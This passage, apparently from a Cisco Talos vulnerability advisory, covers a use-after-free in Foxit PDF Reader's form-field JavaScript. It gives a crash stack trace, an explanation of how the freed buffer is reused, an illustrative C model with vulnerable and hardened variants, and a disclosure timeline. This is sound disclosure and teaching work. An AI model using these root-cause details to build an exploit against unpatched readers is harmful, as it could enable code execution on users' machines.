0f 076fe204 034371d9     292c2339 3d252161 00000012 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4053bb
10 076fe25c 034371d9     18a7eb6d 3d251e0d 3d251e61 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
11 076fe288 03435860     18a7eb6d 292c21b1 3d251e0d FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
12 076fe2a0 03435689     00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39faa0
13 076fe2cc 030d1f4e     15bb20a0 292c2339 3d251e0d FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39f8c9
14 076fe3dc 030d1a42     076fe570 15bb20a0 076fe438 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c18e
15 076fe464 030ba744     076fe570 15bb20a0 15b8b5e4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bc82
16 076fe614 030ba240     076fe6b0 15b8b60c 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24984
17 076fe628 03093c5f     076fe6b0 15b8b60c 175d8a7a FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24480
18 076fe6a0 03094596     15b8b5e4 0f961790 15b8b5d0 FoxitPDFReader!FXJSE_Runtime_Release+0xeaf
19 076fe6dc 02c38af7     15f38f70 18bb03bc 0f961790 FoxitPDFReader!FXJSE_ExecuteScript+0x86
1a 076fe794 02c3a129     00000000 076fe824 076fe7cc FoxitPDFReader!safe_vsnprintf+0x10ddcc7
1b 076fe7ac 00f720df     076fe824 076fe7cc 175d8b06 FoxitPDFReader!safe_vsnprintf+0x10df2f9
1c 076fe7dc 00f70fa4     15f3fb88 00000015 076fe804 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c69cf
1d 076fe81c 00f6f9d0     15932710 1035b720 1642d940 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c5894
1e 076fe870 0085d322     076fe8a0 1035b720 1642d940 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c42c0
1f 076fe8c0 00ad901b     00000000 175d983e 7fffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x8852
20 076ff4e4 04079713     00000000 00000000 175d996e FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x6194b
21 076ff5b4 0407a8ec     00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x199cc3
22 076ff5d8 04075292     00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x19ae9c
23 076ff64c 04075b05     103652e8 000502f4 00000429 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x195842
24 076ff66c 75a412bb     000502f4 00000429 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1960b5
25 076ff698 75a37a5a     04075ad1 000502f4 00000429 USER32!AddClipboardFormatListener+0x4b
26 076ff780 75a36391     04075ad1 00000000 00000429 USER32!GetClassLongW+0x7aa
27 076ff7fc 75a35eb0     00000329 076ff824 00a5f324 USER32!DispatchMessageW+0x4f1
28 076ff808 00a5f324     0c6a8c60 0c6a8c60 05b998e8 USER32!DispatchMessageW+0x10
29 076ff824 00a5f3e3     05b998e8 00a5f350 ffffffff FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dfe74
2a 076ff844 044a29c2     00000000 05bc550c 075da000 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dff33
2b 076ff85c 0425cef1     00610000 00000000 0c6453c4 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5c2f72
2c 076ff8a8 76a5fcc9     075da000 76a5fcb0 076ff914 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x37d4a1
2d 076ff8b8 77b87c5e     075da000 336677e2 00000000 KERNEL32!BaseThreadInitThunk+0x19
2e 076ff914 77b87c2e     ffffffff 77ba8c16 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0x11e
2f 076ff924 00000000     0425cfc0 075da000 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0xee

At (10) above, we can observe that ecx contains the same memory pointer, which now belongs to a freed allocation. Note that the vulnerable buffer has been reused as a bytestring object. The value at offset 0xC of the vulnerable buffer is passed as the this pointer to a method at (11). The crash occurs at (12) when that pointer is dereferenced without any validation. Depending on the memory layout of the process, it may be possible to obtain arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.
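To make the ordering described by the proof of concept and the debugger walkthrough concrete, the following C model (added here for illustration; it is neither Foxit's code nor the PoC above) replays the sequence: a CreateControl-style routine allocates the field object, the Calculate action fires inside addField, deletePages frees the object through a pool allocator whose freed slots stay mapped, and addField then reads the object again. It is shown beside a hardened variant that re-validates the object through a slot/generation handle after the callback returns. All names, the struct layout, the pool allocator and the POISON value are assumptions made for the model.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* Constructed model of the bug class in this advisory, not Foxit's code: addField()
 * creates a field object, a Calculate action fires, it calls deletePages(), and
 * addField() keeps using the freed object. The pool stands in for a custom allocator. */

#define MAX_FIELDS  8
#define FIELD_MAGIC 0x46494C44u  /* "FILD": marks a live field object */
#define POISON      0x62626962u  /* stands in for unrelated data that reuses the slot */

typedef struct {
    uint32_t magic;       /* FIELD_MAGIC while the object is live */
    uint32_t generation;  /* unique per allocation, so a stale handle can be spotted */
    int      type;        /* illustrative: 0 = text, 1 = checkbox */
} Field;

typedef struct Document {
    Field *fields[MAX_FIELDS];
    int    nfields;
    void (*calculate_action)(struct Document *);  /* installed by setAction("Calculate") */
} Document;

static Field    g_pool[MAX_FIELDS];
static int      g_in_use[MAX_FIELDS];
static uint32_t g_next_gen = 1;

static Field *pool_alloc(void) {
    for (int i = 0; i < MAX_FIELDS; i++) {
        if (g_in_use[i]) continue;
        g_in_use[i] = 1;
        g_pool[i].magic = FIELD_MAGIC;
        g_pool[i].generation = g_next_gen++;
        return &g_pool[i];
    }
    return NULL;
}

/* Freed memory stays mapped; emulate the slot being handed to another allocation. */
static void pool_free(Field *f) {
    g_in_use[f - g_pool] = 0;
    f->magic = POISON;
    f->type  = (int)POISON;
}

/* deletePages(): drops everything the pages own, including every field object. */
static void delete_pages(Document *doc) {
    for (int i = 0; i < doc->nfields; i++) pool_free(doc->fields[i]);
    doc->nfields = 0;
}

/* CreateControl(): allocates the field object and registers it with the form. */
static Field *create_control(Document *doc, int type) {
    Field *f = pool_alloc();
    if (!f) return NULL;
    f->type = type;
    doc->fields[doc->nfields++] = f;
    return f;
}

/* Vulnerable pattern: trusts the raw pointer across the action; returns garbage if freed. */
static int add_field_unchecked(Document *doc, int type) {
    Field *f = create_control(doc, type);
    if (!f) return -1;
    if (doc->calculate_action) doc->calculate_action(doc);  /* may free f */
    return f->type;                                          /* use after free */
}

/* Hardened pattern: re-validate (slot, generation) after the action; -2 if the field is gone. */
static int add_field_checked(Document *doc, int type) {
    Field *f = create_control(doc, type);
    if (!f) return -1;
    int slot = (int)(f - g_pool); uint32_t gen = f->generation;
    if (doc->calculate_action) doc->calculate_action(doc);
    Field *cur = &g_pool[slot];
    if (!g_in_use[slot] || cur->magic != FIELD_MAGIC || cur->generation != gen)
        return -2;  /* freed (and possibly reused) during the callback: bail out */
    return cur->type;
}

/* The PoC's Calculate action: deletePages() called twice, as in the script. */
static void calculate_delete_pages(Document *doc) { delete_pages(doc); delete_pages(doc); }

/* Replays the PoC ordering: addField, install the action, addField again (fires it). */
static int run_poc(int use_checked) {
    memset(g_pool, 0, sizeof g_pool);
    memset(g_in_use, 0, sizeof g_in_use);
    Document doc = { {0}, 0, NULL };
    add_field_unchecked(&doc, 1);                    /* no action installed yet */
    doc.calculate_action = calculate_delete_pages;   /* setAction("Calculate", ...) */
    return use_checked ? add_field_checked(&doc, 1) : add_field_unchecked(&doc, 1);
}

int main(void) {
    printf("unchecked: 0x%x  checked: %d\n", (unsigned)run_poc(0), run_poc(1));
    return 0;
}
```

The unchecked variant returns the POISON value that overwrote the freed slot, mirroring the "Ribb..." bytestring seen at (10); the checked variant refuses to touch the object and returns -2.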

TIMELINE

2024-04-11 - Vendor Disclosure
2024-09-26 - Vendor Patch Release
2024-10-02 - Public Release

Credit

Discovered by KPC of Cisco Talos.